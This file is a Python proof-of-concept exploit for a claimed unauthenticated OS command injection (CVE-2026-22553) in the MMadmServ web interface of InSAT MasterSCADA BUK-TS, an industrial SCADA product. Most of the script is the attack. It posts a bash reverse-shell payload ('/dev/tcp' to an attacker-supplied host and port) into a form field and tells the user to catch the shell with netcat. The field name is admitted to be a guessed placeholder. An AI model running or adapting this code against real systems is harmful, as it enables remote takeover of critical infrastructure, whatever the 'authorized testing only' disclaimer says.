README.md
Rendering markdown...
#!/usr/bin/env python3
# Exploit Title: InSAT MasterSCADA BUK-TS MMadmServ OS Command Injection
# CVE: CVE-2026-22553
# Date: 2026-05-14
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://insat.ru
# Software Link:
# Affected: InSAT MasterSCADA BUK-TS (All versions)
# Tested on:
# Category: Remote Code Execution
# Platform: Linux
# Exploit Type: OS Command Injection (CWE-78)
# CVSS: 9.8 (Critical)
# CWE : CWE-78
# Description: Unauthenticated OS Command Injection in MMadmServ web interface leading to RCE
# Fixed in: Not fixed (No vendor response)
# Usage: python3 exploit.py <target> --lhost <your_ip> --lport <your_port>
#
# Examples:
# python3 exploit.py http://192.168.1.100:8080 --lhost 192.168.1.50 --lport 4444
#
# Options:
# --lhost Attacker IP for reverse shell
# --lport Attacker port for reverse shell
#
# Notes:
# This is a Proof of Concept for educational and authorized testing only.
# Targeting critical infrastructure without permission is illegal.
print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║
║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║
║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║
║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║
║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║
║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║
║ ║
║ [ b a n y a m e r _ s e c u r i t y ] ║
║ ║
║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║
║ ║
║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║
║ Handle : @banyamer_security ║
║ ║
║ Exploit : CVE-2026-22553 ║
║ Target : InSAT MasterSCADA BUK-TS ║
║ ║
║ Status : ACTIVE ║
║ ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")
import requests
import sys
import argparse
def main():
parser = argparse.ArgumentParser(description="CVE-2026-22553 PoC")
parser.add_argument("target", help="Target URL (e.g. http://192.168.1.100:8080)")
parser.add_argument("--lhost", required=True, help="Your IP for reverse shell")
parser.add_argument("--lport", required=True, help="Your listening port")
args = parser.parse_args()
target = args.target.rstrip("/")
lhost = args.lhost
lport = args.lport
# Reverse shell payload (bash)
payload = f"; bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
print(f"[+] Target : {target}")
print(f"[+] LHOST : {lhost}")
print(f"[+] LPORT : {lport}")
print(f"[+] Sending reverse shell payload...")
# Common vulnerable field name (adjust if needed)
data = {"command": f"test{payload}", "submit": "1"} # placeholder field
try:
r = requests.post(f"{target}/MMadmServ", data=data, timeout=8, verify=False)
print(f"[+] Request sent | Status: {r.status_code}")
print("[+] Check your listener (nc -lvnp " + lport + ")")
except Exception as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
main()